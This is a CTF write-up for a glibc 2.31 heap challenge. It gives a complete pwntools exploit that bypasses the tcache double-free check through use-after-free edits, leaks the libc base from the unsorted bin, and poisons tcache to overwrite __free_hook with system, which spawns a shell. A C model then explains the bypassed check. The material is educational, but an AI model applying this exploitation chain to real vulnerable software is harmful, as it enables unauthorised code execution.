
PWN Challenge Time Heap

March 31, 2021 • Read: 343 • Pwn,CTF

Challenge information

1. libc 2.31
2. Only two add operations; each add allocates two chunks (content and remark).
3. There is an edit and a show.

Approach

1. After a free, use edit to bypass the check and free the chunk into tcache 7 times.
2. Freeing once more puts the chunk into the unsorted bin; leak libc from it.
3. Change the next pointer to __free_hook (the second chunk allocated by add will land there) and overwrite it with system.
4. free triggers system.

from pwn import *

#r = process('./time_heap')
r = remote('nc.eonew.cn', 10015)
context.log_level = "debug"
libc = ELF('libc2.31/libc.so.6')


def choice(idx):
    r.sendlineafter("Your choice: ", str(idx))


def add(size, content='a', remark='b'):
    # One add allocates two chunks: content first, then remark
    choice(1)
    r.sendlineafter("Size: ", str(size))
    r.sendafter("Content: ", content)
    r.sendafter("Remark: ", remark)


def delete(idx):
    choice(2)
    r.sendlineafter("Index: ", str(idx))


def edit(idx, content='a', remark='b'):
    # Writes to a chunk even after it was freed (use after free)
    choice(3)
    r.sendlineafter("Index: ", str(idx))
    r.sendafter("Content: ", content)
    r.sendafter("Remark: ", remark)


def show(idx):
    choice(4)
    r.sendlineafter("Index: ", str(idx))


add(0x88)  # index 0; chunk size 0x90 is beyond fastbin range, so it ends up in unsorted bin once tcache is full
for i in range(7):
    delete(0)
    edit(0, 'a' * 0x10)  # clobber next and key of the freed chunk so the tcache double-free check does not fire
delete(0)  # tcache bin already holds 7, so this free goes to the unsorted bin
show(0)    # fd of an unsorted chunk points to main_arena+96
# bytes literals keep this working on Python 3 pwntools (str fill for bytes.ljust raises TypeError)
malloc_hook_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
libc.address = malloc_hook_addr - libc.sym['__malloc_hook']
log.success("libc_base: " + hex(libc.address))
edit(0, p64(libc.sym['__free_hook']))  # tcache poisoning: next pointer of the tcache head -> __free_hook
add(0x88, '/bin/sh\x00', p64(libc.sym['system']))  # content comes from tcache, remark is served at __free_hook
delete(1)  # free('/bin/sh') now calls system('/bin/sh')
r.interactive()
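To show why step 1 gets past libc 2.31's double-free check, here is an added C model (not from the writeup or the challenge) of the key test that free() performs on a tcache-sized chunk: the key field sits right after the next pointer in the freed chunk's user data, so the writeup's edit(0, 'a' * 0x10) overwrites both. Names such as model_free, the 0x88 buffer and the single-bin tcache are our own simplifications.

```c
#include <stddef.h>
#include <string.h>
/* Model of the glibc 2.31 tcache double-free check (illustration, names ours).
 * A freed chunk's user data starts with `next`, then `key`; free() sets key to
 * the tcache struct address and malloc() clears it. */
typedef struct tcache_entry {
    struct tcache_entry *next;
    void *key;
} tcache_entry;
#define TCACHE_MAX 7
static struct { size_t count; tcache_entry *head; } bin;  /* one size class */
static void *const tcache = &bin;  /* stands in for the per-thread tcache */

/* 1: linked into tcache; 0: double free detected ("free(): double free
 * detected in tcache 2"; real glibc also walks the bin before aborting);
 * -1: bin full, so a 0x90 chunk would go to the unsorted bin instead. */
int model_free(void *p) {
    tcache_entry *e = p;
    if (e->key == tcache)
        return 0;
    if (bin.count >= TCACHE_MAX)
        return -1;
    e->next = bin.head;
    e->key = tcache;
    bin.head = e;
    bin.count++;
    return 1;
}

static char chunk[0x88];  /* constructed stand-in for the 0x88-byte allocation */
static void reset(void) { memset(chunk, 0, sizeof chunk); bin.count = 0; bin.head = NULL; }

/* A plain double free is caught by the key check. */
int naive_double_free_caught(void) {
    reset();
    return model_free(chunk) == 1 && model_free(chunk) == 0;
}

/* The writeup's step 1: each edit after free clobbers next and key, so the check
 * never fires and the chunk is linked seven times; the eighth free overflows
 * tcache and (in real glibc) lands the chunk in the unsorted bin, step 2. */
int writeup_step1_fills_tcache(void) {
    reset();
    for (int i = 0; i < 7; i++) {
        if (model_free(chunk) != 1) return 0;
        memset(chunk, 'a', 0x10);  /* edit(0, 'a' * 0x10) */
    }
    return bin.count == 7 && model_free(chunk) == -1;
}
```

The check is only a heuristic on bytes the program itself can still write, which is why a use-after-free edit is enough to defeat it; glibc 2.34 and later make the key a per-process random value, but an edit still clobbers it.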